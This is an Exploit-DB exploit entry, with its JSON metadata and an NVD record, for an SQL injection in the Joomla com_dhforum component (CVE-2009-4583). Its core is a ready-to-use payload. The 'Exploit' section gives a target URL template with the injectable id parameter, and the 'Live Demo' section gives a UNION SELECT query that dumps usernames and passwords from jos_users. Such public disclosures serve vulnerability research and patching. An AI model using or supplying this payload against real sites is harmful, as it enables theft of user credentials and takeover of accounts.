ID EDB-ID:10742
Type exploitdb
Reporter ViRuSMaN
Modified 2009-12-27T00:00:00
Description
Joomla Component com_dhforum SQL Injection Vulnerability. CVE-2009-4583. Webapps exploit for php platform
==============================================================================
_ _ _ _ _ _
/ \ | | | | / \ | | | |
/ _ \ | | | | / _ \ | |_| |
/ ___ \ | |___ | |___ / ___ \ | _ |
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
==============================================================================
======
[»] Joomla Component com_dhforum SQL Injection Vulnerability
========================================================================
======
[»] Script: [ joomla Component ]
[»] Language: [ PHP ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
[»] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]
===[ Live Demo ]===
[»] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat
(username,0x3a,password)+from+jos_users--
Author: ViRuSMaN <-
###########################################################################
{"bulletinFamily": "exploit", "id": "EDB-ID:10742", "cvelist": ["CVE-2009-4583"], "modified": "2009-12-27T00:00:00", "lastseen": "2016-02-01T13:06:10", "edition": 1, "sourceData": "==============================================================================\r\n_ _ _ _ _ _\r\n/ \\ | | | | / \\ | | | |\r\n/ _ \\ | | | | / _ \\ | |_| |\r\n/ ___ \\ | |___ | |___ / ___ \\ | _ |\r\nIN THE NAME OF /_/ \\_\\ |_____| |_____| /_/ \\_\\ |_| |_|\r\n\r\n\r\n==============================================================================\r\n======\r\n[\u00bb] Joomla Component com_dhforum SQL Injection Vulnerability\r\n========================================================================\r\n\r\n======\r\n\r\n[\u00bb] Script: [ joomla Component ]\r\n[\u00bb] Language: [ PHP ]\r\n[\u00bb] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]\r\n[\u00bb] Greetz to: [ HackTeach Team ,Egyptian Hackers ,All My Friends &pentestlabs.com ]\r\n[\u00bb] My Home: [ HackTeach.Org , Islam-Attack.Com ]\r\n\r\n###########################################################################\r\n\r\n===[ Exploit ]===\r\n\r\n[\u00bb] http://[target].com/[path]/index.php?option=com_dhforum&view=grouplist&id=[SQL]\r\n\r\n\r\n\r\n===[ Live Demo ]===\r\n\r\n[\u00bb] http://server/index.php?option=com_dhforum&view=grouplist&id=-1+union+select+concat\r\n\r\n(username,0x3a,password)+from+jos_users--\r\n\r\nAuthor: ViRuSMaN <-\r\n\r\n###########################################################################", "published": "2009-12-27T00:00:00", "href": "https://www.exploit-db.com/exploits/10742/", "osvdbidlist": ["61565"], "reporter": "ViRuSMaN ", "hash": "83becfff418db263bb16e112c3f9e53d499fc59a21f327b6532509a313bf4306", "title": "Joomla Component com_dhforum SQL Injection Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Joomla Component com_dhforum SQL Injection Vulnerability. CVE-2009-4583. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10742/", "enchantments": {"vulnersScore": 3.5}}
{"result": {"cve": [{"id": "CVE-2009-4583", "type": "cve", "title": "CVE-2009-4583", "description": "SQL injection vulnerability in the DhForum (com_dhforum) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the id parameter in a grouplist action to index.php.", "published": "2010-01-06T17:00:11", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4583", "cvelist": ["CVE-2009-4583"], "lastseen": "2017-08-17T11:14:35"}]}}